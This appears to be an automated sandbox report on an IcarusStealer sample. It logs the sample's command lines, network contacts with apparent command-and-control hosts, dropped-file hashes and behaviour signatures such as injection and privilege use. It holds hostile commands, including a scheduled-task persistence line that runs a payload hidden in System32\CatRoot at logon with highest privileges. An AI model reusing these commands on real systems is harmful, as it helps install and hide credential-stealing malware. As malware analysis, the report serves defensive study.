"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp66BF.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "$SXR"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA31B.tmp.bat""

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA31C.tmp.bat" "

C:\Windows\SysWOW64\schtasks.exe

schtasks /delete /f /tn "$SXR"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" title $SXR "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" title $SXR "

Network

Country Destination Domain Proto
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 172.67.72.57:443 keyauth.win tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:80 ipinfo.io tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
N/A 127.0.0.1:49232 tcp
N/A 127.0.0.1:49234 tcp
N/A 127.0.0.1:49271 tcp
N/A 127.0.0.1:49273 tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp

Files

\Users\Admin\AppData\Local\Temp\Client.exe

MD5 32383cdbef6c4872f7090d99898da11d
SHA1 4d49cd961024d6a11a906a8133d20ce56a8969ff
SHA256 096c4473b024504a82ad05dbdd9991707e00ab346edac3e9f8082e98638dec7f
SHA512 97055a545cce9d9df0333748021f9c13657c3965fed0c9db582e5c8489b4f204e4be82a3481558e300880efcf52d491c37232c1aaa65115ab969cb54e4d21888

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 96605ff2ba53a43726305cac941fd2a9
SHA1 d1ef02047a89cf9f94ed776c690e37191ec4f144
SHA256 fa02a1cae524c1be9e68a77c3aec90ed2b7b59e0d9bf8845b4fc76bbe6d79ab8
SHA512 319881aa3e9266d1e0adedf94af3e1274ba130428f4c9f5b1d5e04d0bdabe8b4495b1744221d331df166c8d462d812bb757a6ab15924c45947501bd78fc9c741

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 2ec0a9af6e3e82b6eb15ac9299e3b8c9
SHA1 9f3f1278c4895c8dd239c66868c2f73b01d2cd4d
SHA256 37033021ec152f88d68c968c28e361025087fd86927aca175bc5e23fd8dda172
SHA512 3fd2b904669972ef2decafc34450bb32d0b4dce3827d1c8aa170e35129f2468bab9defad66654acce1729d07303a3b8acf7703d2727eb9ac8d972fd17408e62f

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 4eedf1fd8387bb9abbe0bfa2a3094efa
SHA1 20c741456d9654b1edb556c6989022786b4b12da
SHA256 b64a14590bff2eaf723db4ae43c725c2d1d1090b4d9c9d8c1b2443bad19439d7
SHA512 646be46f6eb1a43a5720373ba815a6a6042cceedd5ce28322727f1705b5407659f81c1ee374152bf6a698c5e7583fc27752a49119c558228e59068b8c5e4324c

\Users\Admin\AppData\Local\Temp\switched.exe

MD5 763da8a5d8dcc7bc162c1d5c326d4e14
SHA1 8606a68dc1406ec014a3dd60973a3a7ab07a9911
SHA256 c5618ea14dc6db5a8167e75c6cd1d459be18e5d1b4cdb6c73744618ef78e5430
SHA512 9317784d9c3c323f2a82ce9829985589e0933092e1842b29ff36cfda8b423e7aa8ecd456c332c02ae9ae1afd146df9d1f7320448c7738d1474feffa682afa637

\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 08fc88f76cfc0c696710703e99181efd
SHA1 8672bdaddacf6d1cb571080d3730f9de30a9c69e
SHA256 23ee105659e0f0eb244e9ac131c16e41d348e09eaf1a5763c9e8175e0d90e9bb
SHA512 3b8972f4b4de5fcfaa2e250d040c7f2260f1be1ed3e7d26f0fc02c78d73cab8f1b94a854641b980c7743de75c29c7e5bcb2057e0282f897ecc43cdddc59b92a8

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 b4454d81129c0068648c1b094eebb919
SHA1 3f3ac4bb5a5249c0d1cca9c10e979c9264f43a1d
SHA256 f2e244f323f35f62b114b4c7b29a3c104da224b547ed2c3d87847a2208386c4f
SHA512 f65ee938a66844ec068e5664c8c2166845f634c91a5d22a88b58b9298f622b4e35b8e2070bd9fe2343e91b1cc9d645236f6e17c6593df417fdc66fae78757072

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

memory/2964-24-0x0000000000920000-0x0000000000F60000-memory.dmp

memory/2112-26-0x0000000001370000-0x00000000013F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 e9c214de199d7c49981b73e0efb8428a
SHA1 8a2b0592b79ccc872bc9bb63a877675307a61fd4
SHA256 009ccf66b0bfe6586849ab4d50d509146816f1a3606e3e3874477871055501b9
SHA512 02ce0bb9bed240a339989e4c25406f48b8f8fc4cafb22908d131fbdf4ef2a11e3af2c90d7d53b39f841e8aeba9a701c3561d924bba3ff0032c56ebc584187c6d

memory/2964-28-0x0000000073B30000-0x000000007421E000-memory.dmp

memory/2704-29-0x000000013FDA0000-0x00000001401DC000-memory.dmp

memory/2112-30-0x0000000073B30000-0x000000007421E000-memory.dmp

memory/2112-31-0x00000000012B0000-0x00000000012F0000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fkmzrhs3\fkmzrhs3.cmdline

MD5 59a2301e7c3e2183b484c7c285bf7c3f
SHA1 0b746ba249b7b8d03709b818aec996aa88c4d745
SHA256 7bd755a985eebf10a617802817c5bd6f5c84af2b1db25630cb328033538745ed
SHA512 6f688af258e3af376e47fa99682ba87078bf6dddaf72d8d2ed765cf2b70749af9031210adf410397eba84f5415ddf48a63b4c86f45ad24e70bb63e3ea0741ae6

\??\c:\Users\Admin\AppData\Local\Temp\fkmzrhs3\fkmzrhs3.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

C:\Users\Admin\AppData\Local\Temp\RES4D84.tmp

MD5 6b9a083a65bd69541034d04a419e1de2
SHA1 60b7c9b0ef4236c57ac99b91b84dfed13f95f8af
SHA256 8a94d00196e40150cf769fc041e28deef92d30710d905d4fa775170636661352
SHA512 bf477de0b0a990d6fea382245802777a41cbb34dcf745c5e00c828789a2f84797d4f9f126e82dc9519100fc5acbdc8d5128b962fbd7b9f35833d3e15082e10a7

\??\c:\Users\Admin\AppData\Local\Temp\CSC21939969A3334B0EBD83DEA3FE3917B8.TMP

MD5 810535a8ae563d6aa53635a1bb1206ff
SHA1 f5ba39f1a455eb61efe5022b524892249ee75dce
SHA256 7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA512 5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

memory/2644-44-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2644-46-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2644-45-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2644-48-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2644-49-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2644-47-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2644-51-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2644-53-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2644-54-0x0000000073B30000-0x000000007421E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Start.exe

MD5 ee45c0a3c1515ae2d044c86feb15feed
SHA1 b5450af0053fb9d0c87fc8a10fe822a0a9e037b4
SHA256 607d368371e130ae05030617e8642537f137d4254f209e00808c33c898077b18
SHA512 6016c456f77b501d1712694affc320573683331b9c2ce8b7edcae9f1b3d2c273df2223be046449ff6431d1e87f8a1b26493dd59b1dbba0c72a6d4d53185a47b7

memory/2644-59-0x0000000004B70000-0x0000000004BB0000-memory.dmp

memory/892-60-0x0000000001170000-0x0000000001178000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 bd879fd72701515c9018ce7526ccff48
SHA1 eab0b6413cdc7c6434095f325f2a686323619d24
SHA256 f15188c01cdcceff726e5c13981000fbf4468be4982c8d9e7d8c69f0b533789f
SHA512 2414af9b32db3c8a89b827b7bfd6432d686e9bb5ba190c5a92ac4880c230651c9482f89c6165b8c9e025609a168880848e3be55de25dfabb1155aa09cb06ef62

memory/892-68-0x000007FEF4A30000-0x000007FEF541C000-memory.dmp

memory/2112-69-0x0000000073B30000-0x000000007421E000-memory.dmp

memory/2528-70-0x000000006E490000-0x000000006EA3B000-memory.dmp

memory/2704-71-0x000000013FDA0000-0x00000001401DC000-memory.dmp

memory/852-73-0x0000000002250000-0x0000000002290000-memory.dmp

memory/852-72-0x000000006E490000-0x000000006EA3B000-memory.dmp

memory/852-75-0x000000006E490000-0x000000006EA3B000-memory.dmp

memory/2528-74-0x00000000027C0000-0x0000000002800000-memory.dmp

memory/2528-76-0x000000006E490000-0x000000006EA3B000-memory.dmp

memory/852-77-0x0000000002250000-0x0000000002290000-memory.dmp

memory/2964-79-0x00000000051F0000-0x0000000005230000-memory.dmp

memory/852-78-0x0000000002250000-0x0000000002290000-memory.dmp

memory/892-82-0x000000001AD00000-0x000000001AD80000-memory.dmp

memory/2528-84-0x000000006E490000-0x000000006EA3B000-memory.dmp

memory/852-85-0x000000006E490000-0x000000006EA3B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp66BF.tmp.bat

MD5 e97b1422bf55757e91c1f0cfd2cc5630
SHA1 1b299a971877024643fedb08c1b38ad7ee6dd9f5
SHA256 b79ba238c75feda2cbb99d6c14758d040c052128509bf205eb4425341d25ad81
SHA512 b0d4187c31d9fc72a98ca64ecf47dcc787a969cef505bdc60a05e23ee654c9aceb2f4595f53242ea78608a0b0d0d57c8a56d4a380c6cc65f21fb76177bdcf213

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 946ba3f539703ec6a973e9b5f7f6c447
SHA1 cdd60eaa0591453fad414f304e0ba1affb1350c4
SHA256 5a0e889aa04c890faeac643f98ee9b7d2ab46ec13adb594147ec088960b6c36d
SHA512 00deb839f70d4a9842754ee2207ac1dc83888f017932545b0dad5c0bacfb1a0cd790e4e5ffb737ecbbf59234c7982ddab82d46ec01fbf803de79b3632e68c1f2

memory/1572-95-0x0000000004060000-0x0000000004061000-memory.dmp

memory/2964-97-0x0000000073B30000-0x000000007421E000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 b6561eec7b123aac49efacdb3444d489
SHA1 1a91eaf4b40443f16b2719ad822b1697f899088c
SHA256 79d0cdd20939a6a8b15b8552f3a491011f122a9be38275315a746066e3b7183f
SHA512 33bbd63a5abe9bb0788f996ae7df17dbe0ef54d3f9a1aca377195330aa8e471ed35887c04352eb4db330454a9c21e6873e437e55754c244a921df8bea5eb238f

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 368cd05f08475cbf7ce3d84f2d94aa30
SHA1 350fab4bf1fe16a11588822799adfbfa75eb4411
SHA256 e7e74cf7616d60d83d47ca32db37801cc06eb28c1770f6eb2c78d1d4a1d4da90
SHA512 6f3453119aeb21343e83d0ef3fc3b4b70a9ab5e8387df41c88b30910171d31593f029dad0371e4aa763a0117ab7647db0d66d2974be21dcc0d9f36f638a7adda

\Windows\System32\catroot\$SXR\$SXR.exe

MD5 7fb91818e5191358f4b7966a2f7fa7fa
SHA1 d70fc10c4fbb4c1251ca7268f202e2b65683c5e2
SHA256 7e88cd4cd271be9bcb5a99f1df4818ec3dddb9bbb84ae8241956a8447f2a8dcb
SHA512 bd7740e6adad6c3e72988e6c0e7d98631d3ea32c0660f078f0c5eea0b8a7baf337ba5964ebe5d71bc114e3d41c7a642fbdf0c13850f256a1cc5e7e9e90e21183

memory/2256-101-0x0000000073B30000-0x000000007421E000-memory.dmp

memory/2256-102-0x0000000000130000-0x0000000000770000-memory.dmp

memory/2256-103-0x0000000004A00000-0x0000000004A40000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

C:\Users\Admin\AppData\Local\Temp\Cab8D15.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

memory/2644-122-0x0000000073B30000-0x000000007421E000-memory.dmp

memory/2644-123-0x0000000004B70000-0x0000000004BB0000-memory.dmp

memory/892-124-0x000007FEF4A30000-0x000007FEF541C000-memory.dmp

memory/892-125-0x000000001AD00000-0x000000001AD80000-memory.dmp

memory/1572-126-0x0000000004060000-0x0000000004061000-memory.dmp

memory/2256-127-0x0000000073B30000-0x000000007421E000-memory.dmp

memory/2256-128-0x0000000004A00000-0x0000000004A40000-memory.dmp

memory/2256-133-0x0000000000B00000-0x0000000000B0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarA163.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\Local\Temp\tmpA31B.tmp.bat

MD5 77254e2811a755365d545e1d3ff9f2d3
SHA1 a636da37c78d35f5ae4da354ba713828c84bbc1d
SHA256 93d089dd1ca2d4aceb2f1ba6af5576e5af340026e28a93bc3f65cf9a39674505
SHA512 109f6917181e2eb904f449bda73ee879258b3ecc943396662c3fb283e7ec0f723fc2b5ab1e17bc1c0400b51d8408869e126a76a81259cee48b7464d110ce84a0

C:\Users\Admin\AppData\Local\Temp\tmpA31C.tmp.bat

MD5 f2697feb7becc5a54edb76e977ec4eac
SHA1 1d01d851e6d8fbe16f65450c63edacb1206db3ac
SHA256 150b2433a9af62aba783a7f63d71156246df6edd444a256fa86818a1f742af1d
SHA512 0cf118eb683a66810605994479cb4dc2c8c2d0602bf996704d0a447ec142a7e9e54046cddc9df0f3b27894e6ec91ee5fbf281e153c087cb03664c3e1aaa22803

memory/2256-168-0x0000000073B30000-0x000000007421E000-memory.dmp

memory/1572-170-0x0000000002720000-0x0000000002730000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-09 22:59

Reported

2024-03-09 23:03

Platform

win10v2004-20240226-en

Max time kernel

138s

Max time network

180s

Command Line

"C:\Users\Admin\AppData\Local\Temp\custom111.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\custom111.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File created C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3700 set thread context of 4436 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{7CA9FA90-2D42-4720-9731-185F9E293BBD} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 752 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 752 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 752 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 752 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 752 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 752 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\custom111.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 4456 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 4456 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 4456 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 4456 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 4456 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 4288 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 4288 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 4892 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4892 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4892 wrote to memory of 1568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4892 wrote to memory of 1568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4892 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4892 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3700 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3700 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3700 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2548 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 2548 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 2548 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 2424 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2424 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2424 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2548 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 2548 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 2548 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SysWOW64\cmd.exe
PID 4692 wrote to memory of 3920 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4692 wrote to memory of 3920 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4692 wrote to memory of 3920 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 436 wrote to memory of 5024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 436 wrote to memory of 5024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 436 wrote to memory of 5024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3700 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
PID 3700 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\explorer.exe
